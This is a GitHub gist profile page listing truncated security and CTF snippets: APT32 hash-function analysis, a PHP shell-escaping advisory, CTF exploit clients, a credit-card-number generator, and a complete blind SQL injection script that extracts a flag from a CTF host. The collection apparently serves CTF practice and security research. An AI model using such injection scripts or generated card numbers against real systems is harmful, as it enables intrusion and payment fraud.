Skip to content

Instantly share code, notes, and snippets.

View tqkve's full-sized avatar

Khanh Ta Quang tqkve

24 followers · 9 following
  • Hanoi, Vietnam
View GitHub Profile
@tqkve
tqkve / solidity metadata
Created February 10, 2023 10:06
metadata that solidity compiler added to contract's runtime bytecode
>= v0.4.17
0xa1 0x65 'b' 'z' 'z' 'r' '0' 0x58 0x20 <32 bytes swarm hash> 0x00 0x29
>= 0.5.9
0xa2
0x65 'b' 'z' 'z' 'r' '0' 0x58 0x20 <32 bytes swarm hash>
0x64 's' 'o' 'l' 'c' 0x43 <3 byte version encoding>
0x00 0x32
>= 0.5.12
@tqkve
tqkve / extract_hash.py
Created June 7, 2019 02:01
APT32 name hashing function (https://tradahacking.vn/thưởng-tết-fbcbbed49da7)
import lief
def wthash(name):
name = map(ord, name)
hash = 0
x = 0
y = 0
for i in range(len(name)):
x = x & 0xffffff00 | name[i]
y = x & 0xf
@tqkve
tqkve / escapeshellrce.md
Created December 6, 2017 14:50 — forked from Zenexer/escapeshellrce.md
Security Advisory: PHP's escapeshellcmd and escapeshellarg are insecure

Paul Buonopane [email protected] at NamePros
PGP: https://keybase.io/zenexer

I'm working on cleaning up this advisory so that it's more informative at a glance. Suggestions are welcome.

This advisory addresses the underlying PHP vulnerabilities behind Dawid Golunski's [CVE-2016-10033][CVE-2016-10033], [CVE-2016-10045][CVE-2016-10045], and [CVE-2016-10074][CVE-2016-10074]. It assumes prior understanding of these vulnerabilities.

This advisory does not yet have associated CVE identifiers.

Summary

@tqkve
tqkve / b64_hacklu2017.py
Created October 20, 2017 03:07
import socket
import random
from base64 import b64decode as bd,b64encode as be
HOST = "flatearth.fluxfingers.net"
# HOST = "localhost"
PORT = 1718
def ru(s, end):
res = ""
@tqkve
tqkve / cvv.py
Created September 18, 2017 11:31
import random
visaPrefix = ["4539", "4556", "4916", "4532", "4929", "40240071", "4485", "4716", "4"]
mcPrefix = ["51", "52", "53", "54", "55"]
amexPrefix = ["34", "37"]
disPrefix = ["6011"]
dinnerPrefix = ["300", "301", "302", "303", "36", "38"]
def get_last_digit(ccn):
length = len(ccn) + 1
@tqkve
tqkve / tower-1-svattt-2016.cpp
Created July 17, 2017 09:40
#include "stdafx.h"
#include <stdio.h>
#include <winsock2.h>
#include <Ws2tcpip.h>
#include <string>
#pragma comment (lib,"ws2_32.lib")
/*
vd thuat toan nen':
goc': abacadae (8byte)
max char = a (4 lan xuat hien)
@tqkve
tqkve / webadmin.php
Created October 23, 2016 02:54
<?php
/*
* webadmin.php - a simple Web-based file manager
* Copyright (C) 2004-2011 Daniel Wacker [daniel dot wacker at web dot de]
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
@tqkve
tqkve / extract.py
Created August 28, 2016 17:53
import sys
import zipfile
import os
'''
usage: python extract.py EXE_file
'''
def extract(filename):
zf = zipfile.ZipFile(filename)
f = open('test1.exe', 'wb')
f.write(zf.read(filename))
@tqkve
tqkve / findkey.py
Last active April 26, 2016 17:58
from Crypto.Cipher import AES
arr = [146, 108, 15, 234, 5, 175, 214, 95, 89, 49, 210, 154, 156, 107, 63, 156,153, 221, 77, 116, 82, 151, 18, 214, 136, 34, 18, 174, 172, 217, 53, 29]
cmp = [40, 164, 61, 120, 84, 234, 165, 53, 142, 239, 147, 112, 88, 228, 226, 148]
key = bytearray(16)
j = 0
for i in xrange(len(arr)):
if i % 2 == 0:
key[j] = arr[i] + 2
j += 1
@tqkve
tqkve / web100.py
Last active October 4, 2015 02:49
web100 kma ctf
import requests
true_resp = requests.get('http://128.199.183.44/web100/index.php?sort=rand%28true%29--%20-').text
flag = ''
for i in range(1,50):
print('Testing char {}'.format(i))
for j in range(32,127):
resp = requests.get('http://128.199.183.44/web100/index.php?sort=rand(ascii(substr((select value from `values` limit 0,1),{},1)) = {})-- -'.format(i, j)).text
if resp == true_resp:
flag += chr(j)